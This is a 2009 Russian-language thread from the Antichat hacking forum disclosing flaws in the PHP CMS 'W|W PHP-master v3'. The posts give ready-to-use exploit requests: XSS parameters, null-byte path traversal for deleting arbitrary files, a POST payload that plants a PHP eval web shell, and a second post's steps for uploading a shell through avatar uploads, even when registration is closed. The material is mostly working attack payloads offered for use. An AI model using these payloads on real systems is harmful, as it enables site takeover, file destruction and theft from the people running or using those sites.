ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу W|W PHP-master v3
   
 
 
Опции темы Поиск в этой теме Опции просмотра

W|W PHP-master v3
  #1  
Старый 21.04.2009, 23:26
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию W|W PHP-master v3

скачать: http://www.phpedited.com/pages/dwld_file_op.php?kat=php-master&file=1224065184

xss
register_globals = On
/wwphpmaster/wap/tmpl/dw.php?url='>{xss}<!--
/wwphpmaster/wap/tmpl/hd.php?title=</title>{xss}&description=">{xss}&keywords=">{xss}&u rl='>{xss}
/wwphpmaster/wap/tmpl/err.php?action=badpass&error_color=>{xss}

удаление файлов
/wwphpmaster/wap/pages/kommf_del.php?kat=../../{filename}%00&file=b&entry=c
уязвимый код:
PHP код:
$kat=$_GET['kat'];
$file $_GET['file'];
$entry $_GET['entry'];

unlink ("../file/$kat/$file/komm/rec.$entry"); 
заливка шелла
нужны прив. админа
/wwphpmaster/wap/pages/kommf_edited.php?file=.&kat=.&entry=.
post: name=.&msg=.&kat=../../500.php%00&gb_e_mail=<?=isset($_GET['a'])?eval($_GET['a']):'';?>&gb_site.
уязвимый код:
PHP код:
if (($_SESSION['dostup']==101) || ($_SESSION['dostup']==102) || ($_SESSION['dostup']==103))
...
    $name=$_POST['name'];
    $msg=$_POST['msg'];
    $file_get=$_GET['file'];
    $name trim($name);
    $kat $_GET['kat'];
    $entry_get $_GET['entry'];
    $em $_POST['gb_e_mail'];
    $si $_POST['gb_site'];
    ...
    $file fopen("../file/$kat/$file_get/komm/rec.$entry_get","w+");
    fputs($file,$name."\n");
    fputs($file,$msg."\n");
    fputs($file,$pz_z."\n");
    fputs($file,$ses_z."\n");
    fputs($file,$em."\n");
    fputs($file,$si."\n");
    fclose($file); 
шелл:
/wwphpmaster/500.php?a=phpinfo();

раскрытие пути
бесполезное)
/wwphpmaster/wap/tmpl/func.php
/wwphpmaster/wap/tmpl/conf.php
/wwphpmaster/wap/tmpl/rega.php
/wwphpmaster/wap/pages/dwld_file.php?kat=../../&start=9
Последний раз редактировалось eLWAux; 21.04.2009 в 23:51..
 

  #2  
Старый 21.04.2009, 23:29
rushter
Reservists Of Antichat - Level 6
Регистрация: 23.05.2008
Сообщений: 756
Провел на форуме:
9257858

Репутация: 979


Отправить сообщение для rushter с помощью ICQ
По умолчанию
Заливка шелла через аватары,всё очень просто :
Регистрируемя,проходим авторизацию
Заходим в usr/anketa.php
Льём любой фаил через заливку аватаров
Забирает из wap\lcl\vtr\[nick].php
upd:
Если рега закрыта ничего не мешает нам обратиться напрямую к срипту регистрации pages/rgstr.php
Последний раз редактировалось rushter; 22.04.2009 в 00:15..
 

  #3  
Старый 23.04.2010, 15:18
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
слив РОА
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ